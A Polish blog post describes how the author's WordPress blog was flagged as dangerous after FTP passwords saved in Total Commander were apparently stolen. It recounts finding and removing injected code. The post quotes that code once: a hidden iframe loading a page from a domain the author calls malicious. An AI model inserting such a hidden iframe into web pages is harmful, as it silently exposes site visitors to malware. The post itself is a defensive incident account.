markasblog ponownie bezpieczny…

logoW dniu wczorajszym wiele osób, które na mojego bloga zaglądają mogły się zdziwić widząc komunikat, że strona została uznana za niebezpieczną i może linkować do niebezpiecznego oprogramowania (czyt. wirusów). Wy się zdziwiliście… A co ja miałem powiedzieć? Pomyślałem sobie, najpierw Windows XP na blaszaku ugiął się pod naporem wirusów, a teraz jeszcze bloga nie chcą mi oszczędzić… WTF?! Ale cóż, stało się… Najprawdopodobniej sam się przyczyniłem do tego, że ktoś wstrzyknął mi na stronę kod, który linkował do jl.chura.pl/rc/ (celowo tutaj nie stworzyłem linka, aby nie kusić do wchodzenia na stronę, bowiem na 100% skończy się to zainfekowaniem systemu).

Jak to się stało, że ktoś był w stanie wstrzyknąć szkodliwy fragment kodu do mojej strony. Myślę, a nawet jestem pewien, że za cały incydent odpowiada Total Commander, z którego korzystałem do wymiany plików pomiędzy serwerem hostującym moją stronę, a twardym dyskiem mojego komputera po protokole FTP. Moim błędem, było stworzenie profilu w Total Commanderze do łączenia się z serwerem FTP cba.pl (to akurat rzecz normalnie stosowana i raczej nie niosąca żadnego niebezpieczeństwa) i zapisanie na stałe w profilu hasła do tegoż serwera (i tutaj powinienem się wstydzić, bo jako doświadczonemu użytkownikowi komputera, takich błędów nie wypada robić). Okazuje się, że nie należy ignorować informacji płynących z portali internetowych zajmujących się bezpieczeństwem sieci. Ja niestety zignorowałem komunikat o poważnej luce w Total Commanderze i doigrałem się – hasła zostały wykradzione.

Na trop fragmentu kodu naprowadził mnie raport z „Narzędzi dla webmasterów” udostępnionych przez Google. W raporcie było wyraźnie zaznaczone, że blog linkuje do domeny chura.pl, która jest uznana za niebezpieczną. Cóż, nie pozostało mi nic innego jak przeszukać zawartość plików WordPressa pod kątem zawartości tekstu z ciągiem znaków chura.pl.

Pomocnym narzędziem okazało się rozszerzenie do Firefoksa o nazwie Firebug. Jest to narzędzie, które pozwala przede wszystkim na podgląd kodu strony aktualnie wyświetlanej w przeglądarce internetowej. Skorzystałem z narzędzia wyszukiwania tekstu (wbudowane w Firebuga) i znalazłem. Znalazłem kod, który wyglądał jak poniżej:

<iframe src=”http://jL.chura.pl/rc/” style=”display:none”></iframe>

Jak już zlokalizowałem konkretny fragment kodu za pomocą Firebuga, nie było problemu z usunięciem wstrzykniętego kodu z plików WordPressa. Po dokładnym przeanalizowaniu całości kodu i upewnieniu się, że już nic więcej niepowołanego w nim nie siedzi, zgłosiłem do Google ponowną prośbę o przeanalizowanie strony pod kątem bezpieczeństwa dla odwiedzających. O godzinie 6:00 w poniedziałek (19.06.2009) blog wrócił do sieci już nie obarczony komunikatem o potencjalnym niebezpieczeństwie.

Ja sam pozmieniałem hasła dostępu do wszystkich serweró, które współtworzą infrastrukturę, na której jest mój blog oparty (FTP, MySQL) i oczywiście wykasowałem (i już nie będę zapisywał) z profilów Total Commandera wszelkie hasła. Pragnę również zapewnić wszystkich, że dołożę wszelkich starań, aby odwiedzanie mojego bloga było bezpieczne i nie groziło złapaniem jakiegoś świństwa.

Please follow and like us: